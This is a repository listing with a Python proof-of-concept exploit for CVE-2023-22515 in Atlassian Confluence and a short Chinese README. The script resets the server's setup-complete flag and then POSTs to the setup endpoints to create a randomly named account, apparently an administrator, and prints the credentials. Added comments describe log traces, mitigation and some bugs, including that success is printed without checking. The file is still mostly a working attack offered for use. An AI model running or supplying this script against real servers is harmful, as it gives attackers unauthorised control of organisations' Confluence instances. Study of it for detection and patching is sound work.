# Repository listing: CVE-2023-22515.py, README.md
# File: /CVE-2023-22515.py
#
# Proof-of-concept for CVE-2023-22515 (Atlassian Confluence; see README.md for
# the version range the author gives). The script is a flat sequence of three
# HTTP requests against the URL passed with -url:
#   1. GET  /server-info.action with the query string
#      bootstrapStatusProvider.applicationConfig.setupComplete=false
#   2. POST /setup/setupadministrator.action with a randomly generated account
#   3. POST /setup/finishsetup.action
#
# Defender's view: on the server these appear as exactly those three request
# lines in the access log, in that order, from one client. Requests to
# /setup/*.action on an instance that finished setup long ago, and an account
# nobody in the organisation created (an administrator, going by the endpoint
# name), are the traces to look for. Mitigation is the vendor's fixed release;
# keeping /setup/* unreachable from untrusted networks limits exposure until
# the upgrade is done.
import requests
import warnings
import urllib3
import argparse
import random
import string

# Suppress warnings (original comment: "ignore exceptions"). Every request below
# uses verify=False, so this hides the insecure-TLS warnings urllib3 would emit.
urllib3.disable_warnings()
warnings.filterwarnings("ignore")

parser = argparse.ArgumentParser()
# The help text reads "target url, e.g. http://xx.xx.xx.xx".
# NOTE(review): -url defaults to None, so running without it fails with a
# TypeError at the first `url + "..."` concatenation below.
parser.add_argument('-url', type=str, default=None, help="目标url如:http://xx.xx.xx.xx")
args = parser.parse_args()

url = args.url

proxy = '127.0.0.1:8080'

# NOTE(review): `proxies` is built here but never passed to any requests call
# in this file, so no traffic actually goes through 127.0.0.1:8080.
proxies = {
    'http': 'http://' + proxy,
    'https': 'https://' + proxy
}

# Request headers (original comment: "add request headers").
# 'X-Atlassian-Token: no-check' is Atlassian's documented opt-out for XSRF
# token checks; its presence on /setup/* requests is another log-side marker
# where request headers are recorded.
headers = {
    'X-Atlassian-Token': 'no-check',
    'Content-Type': 'application/x-www-form-urlencoded'
}

# Same XSRF opt-out header, without a Content-Type, for the body-less final POST.
headers2 = {
    'X-Atlassian-Token': 'no-check',
}

# Request 1: the parameter name suggests it sets the application's
# "setup complete" flag to false; the script relies on that to reach the
# /setup/ endpoints afterwards.
response = requests.get(url + "/server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false",
                        verify=False)

# NOTE(review): this rebinds the builtin name `str` for the rest of the script.
str = response.text

# Heuristic check: a plain substring match for "success" anywhere in the
# response body. If it is absent the script prints "the current url is not
# vulnerable" plus the URL and stops.
if not str.__contains__("success"):
    print("当前url不存在漏洞:" + url)
    exit()

# Generate a random username and password (translated original comment):
# 8 lowercase letters and 12 letters/digits respectively.
random_username = ''.join(random.choices(string.ascii_lowercase, k=8))
random_password = ''.join(random.choices(string.ascii_letters + string.digits, k=12))

# Form body built by string concatenation. The generated values are
# alphanumeric, so nothing needs URL-encoding; "%40" is the encoded "@" in the
# <username>@localhost e-mail address.
d = "username=" + random_username + "&fullName=" + random_username + "&email=" + random_username + "%40localhost&password=" + random_password + "&confirm=" + random_password + "&setup-next-button=Next"

# Request 2: submit the account form, reusing the cookies from request 1.
requests.post(url=url + "/setup/setupadministrator.action", headers=headers, data=d,
              cookies=response.cookies,
              verify=False)

# Request 3: the finish-setup step, again with the cookies from request 1.
requests.post(url + "/setup/finishsetup.action", headers=headers2, cookies=response.cookies, verify=False)
# Prints "added successfully", then "username:" and "password:" with the
# generated values.
# NOTE(review): neither POST response is inspected, so this output is printed
# unconditionally and is not evidence that an account was created.
print("添加成功")
print("用户名:" + random_username)
print("密码:" + random_password)
# (end of CVE-2023-22515.py; README.md follows in the listing)
--------------------------------------------------------------------------------
# CVE-2023-22515 Exploit Script

## 影响版本
```
8.0.0<=Atlassian Confluence<=8.5.1
```
具体受影响版本及已修复版本请以 Atlassian 官方安全公告为准。

## 漏洞利用
脚本会添加一个用户名和密码均为随机生成的账户
```
python3 CVE-2023-22515.py -h
usage: confluence.py [-h] [-url URL]
optional arguments:
  -h, --help  show this help message and exit
  -url URL    目标url如:http://xx.xx.xx.xx
```
![image](https://github.com/sincere9/CVE-2023-22515/assets/128219249/caedd132-4cdf-4f94-9831-e45721b85170)

--------------------------------------------------------------------------------